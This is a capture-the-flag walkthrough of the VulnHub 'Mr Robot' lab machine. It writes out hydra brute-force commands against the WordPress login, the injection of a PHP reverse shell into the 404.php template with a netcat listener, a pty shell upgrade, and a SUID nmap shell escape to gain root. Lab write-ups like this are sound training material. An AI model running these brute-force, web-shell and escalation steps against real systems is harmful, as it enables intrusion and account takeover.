Mr Robot

Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

URL: Mr Robot

Difficulty: beginner-intermediate

Author: Leon Johnson

Enumeration

Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).

netdiscover -i eth1

net

We can identify the machine with the IP 192.168.56.117, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap" 192.168.56.119

nmap

To start, port 80 is open so we will investigate this port with a browser.

webpage

This seems to be some type of fancy terminal on the web page. The “help” command shows a few different options, each section has a reference to the TV show Mr Robot

A closer look at the web page source reveals Wordpress running.

wp

Let’s run a Wordpress scan with WPScan. Please note, the newer version requires an API key you can get for free on their website.

wpscan --url http://192.168.56.119/ -e u,vp,vt

According to the results, there is a robots.txt file:

robots

75 Wordpress vulnerabilities have been identified:

wp vuln

And no users have been found:

no users

The robots.txt (not a Mr Robot reference) is always a good place to start, this indicates paths that they want to remain hidden.

Going to this directory on the web directory:

http://192.168.56.119/robots.txt

robots path

There are 2 paths:

fsocity.dic
key-1-of-3.txt

Let’s visit the fsociet.dic:

.dic

cat dic

This seems to be a large wordlist. This could be used to crack a password later on.

And visiting the other path from robots.txt gives us this:

key1

073403c8a58a1f80d943455fb30724b9

This seems to be our first key or flag for this machine.

Let’s do some more enumeration. I ran a dirb scan to find any more directories we haven’t come across. This was the following command:

dirb http://192.168.56.119

dirb

Got loads of results from this. I visited all of them but the majority seem to be rabbit holes or irrelevant files for the website. There was a couple of files to note:

/readme: Wasn’t important but I wanted to share this anyway.

readme

/wp-admin:

wpadmin

We have our Wordpress login. I want to try and brute this login, however, I do not have a username to brute against.

Thanks to Wordpress, we can tell if we are using the correct username when attempting to log in. This is what happens when I entered a wrong username:

wrong user

The failed message indicates the username is unknown, so we can use a tool like hydra to spot a different failure message to find the correct username.

Let’s use the dictionary from before. There seem to be a lot of duplicates so let’s filter these out. We’ll use sort to do this.

sort fsocity.dic | uniq > new.dic 

I also used the following command to count the lines of a file:

wc -l

The line count has gone from 858160 to 11451. Let’s use this new file “new.dic” to find a username.

Let’s set up in order to brute-force the login.

You can find more information about password cracking on this article.

Get the HTTP request:

  1. Set up a proxy

proxy

  1. Open up Burp Suite, the intercept should be on.

burp

  1. Enter a random username and password on the website login page, Burp Suite should capture the request. Send this to the intruder and clear variables (right-click > sent to int > clear §)

intruder

  1. Take note of this request. You can turn off the proxy and intercept now.

Now we can use hydra to test out a bunch of usernames against the login. This is the hydra command:

hydra -vV -L new.dic -p somepassword 192.168.56.119 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Here is a breakdown of the command above:

-vV verbose, -L dictionary, -p irrelevant password, host, brute with post form, ‘login page : POST parameters to send USER PASS are the variables : F= failed message’

Execute this command. After a few minutes I get the following result:

user result

We have identified “elliot” as a username.

Now let’s attempt a password with this username but a different failed attempt message. This is the web page response when I enter the correct username and an incorrect password.

user wp

We have the following failed attempt message:

ERROR: The password you entered for the username Elliot is incorrect

Now let’s do the same method of bruting for the password. This is the new hydra command:

hydra -vV -P new.dic -l elliot 192.168.56.119 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password'

Notice how we are now using our username with -l elliot, and the dictionary for our password now with -P new.dic. We have also changed the failed message, I just shortened it to “The password”.

Running this command gives the following result:

hydra pass

login: elliot password: ER28-0652

Great. We have some credentials, so we now have authenticated access. We can now exploit this, aiming for some kind of reverse shell.

A pretty straight forward method of getting a reverse shell with Wordpress is by uploading a php reverse shell file. I learnt this with another Wordpress machine I recently completed.

You can read more about reverse shells here.

If you’re working from a Kali Linux machine, there are some pre-made web shells in the following directory:

/usr/share/webshells

Use the following command to copy a php reverse shell to your current directory:

cp /usr/share/webshells/php/php-reverse-shell.php .

Edit the file and add your local IP and port 4444.

nano php-reverse-shell.php

edit php

I tried uploading the php file to the website however Wordpress blocks any attempt to upload php files. Another method is to upload the code to an already existing php file.

Go to the editor section on Wordpress and edit the 404.php code.

404

Now the payload is ready, set up a netcat listener to listen on your specified port.

netcat -nvlp 4444

netcat

Now that everything is set up, visit the modified 404.php page.

http://192.168.56.119/404.php

We got a shell.

shell

First things first, I went to visit the /home directory to see who is on the system. There is a user called robot with a couple of files. I was unable to see the contents of the key file but I was able to see what was inside “password.raw-md5”.

ls -la
cd /home/robot
ls
cat key-2-of-3.txt
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

hash

A quick search of this hash on google gave me the original plain text. This is the website that came up:

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b

md5 decrypt

abcdefghijklmnopqrstuvwxyz

Let’s try and change the user to robot with this password that we found in his home directory. Make sure the shell is upgraded to fully interactive TTY, otherwise the command will not work.

python -c 'import pty; pty.spawn("/bin/bash")'
su robot

su

We have successfully logged in a Robot, and we can also view the second key.

key2

822c73956184f694993bede3eb39f959

Privilege Escalation

Now that we have a lower privileged user, we are aiming to escalate this for sudo rights in order to have complete ownership of the system.

Let’s firstly check for SUID. SUID is essentially a way to run a command as another user using any services running on the unix-like operating system. We can use these to elevate our current rights on the system.

This following command checks for all the SUID binaries on the system:

find / -user root -perm -4000 -print 2>/dev/null

suid

If you are interested in another machine where SUID exploitation is needed, look at my other writeup on ByteSec - another Vulnhub machine.

When analysing these binaries, it’s good to have a list of native binaries. Here is a list:

ping
ping6
passwd
sudo
chfn
apring
gpasswd
chsh
chfn
mount
sudo
su
umount
mount
newgrp
pppd

We can identify NMAP as a non-native SUID. We need to investigate this further. I researched how to exploit NMAP SUID binary. This is the website I used:

Pentest Lab

Firstly, let’s get an interactive NMAP shell with the following command:

nmap --interactive

And now we can run the next command for elevated privileges:

!sh

sh

And we have root! Nice and simple SUID exploitation for elevating rights. The last flag should be in /root:

root

Written on May 23, 2020